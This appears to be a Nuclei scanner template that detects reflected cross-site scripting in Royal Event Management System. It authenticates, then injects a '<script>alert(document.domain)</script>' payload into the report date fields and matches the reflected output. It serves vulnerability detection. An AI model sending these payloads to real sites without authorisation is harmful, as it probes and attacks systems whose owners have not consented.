nuclei-templates/http/vulnerabilities/royalevent/royalevent-management-xss.yaml

80 lines
2.7 KiB
YAML

id: royalevent-management-xss
info:
name: Royal Event Management System - Cross-Site Scripting
author: ritikchaddha
severity: high
description: |
Royal Event Management System contains a cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip
- https://packetstormsecurity.com/files/166479/Royale-Event-Management-System-1.0-Cross-Site-Scripting.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cwe-id: CWE-79
metadata:
verified: true
max-request: 2
tags: cms,royalevent,packetstorm,xss,authenticated,intrusive
http:
- raw:
- |
POST /royal_event/ HTTP/1.1
Host: {{Hostname}}
Content-Length: 353
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCSxQll1eihcqgIgD
------WebKitFormBoundaryCSxQll1eihcqgIgD
Content-Disposition: form-data; name="username"
{{username}}
------WebKitFormBoundaryCSxQll1eihcqgIgD
Content-Disposition: form-data; name="password"
{{password}}
------WebKitFormBoundaryCSxQll1eihcqgIgD
Content-Disposition: form-data; name="login"
------WebKitFormBoundaryCSxQll1eihcqgIgD--
- |
POST /royal_event/btndates_report.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFboH5ITu7DsGIGrD
------WebKitFormBoundaryFboH5ITu7DsGIGrD
Content-Disposition: form-data; name="todate"
2022-12-22<script>alert(document.domain)</script>
------WebKitFormBoundaryFboH5ITu7DsGIGrD
Content-Disposition: form-data; name="search"
3
------WebKitFormBoundaryFboH5ITu7DsGIGrD
Content-Disposition: form-data; name="fromdate"
2022-06-22<script>alert(document.domain)</script>
------WebKitFormBoundaryFboH5ITu7DsGIGrD--
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(document.domain)</script>"
- "Report from "
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4b0a004830460221008c2e6f478364f97713eca2117fd1ac9375754f3811b2d613fa0dc71ea6a1da56022100955685d6a2829c3755203356ad56690dbc3c4c38d0d41b7df5b1b8f95794f07b:922c64590222798bb761d5b6d8e72950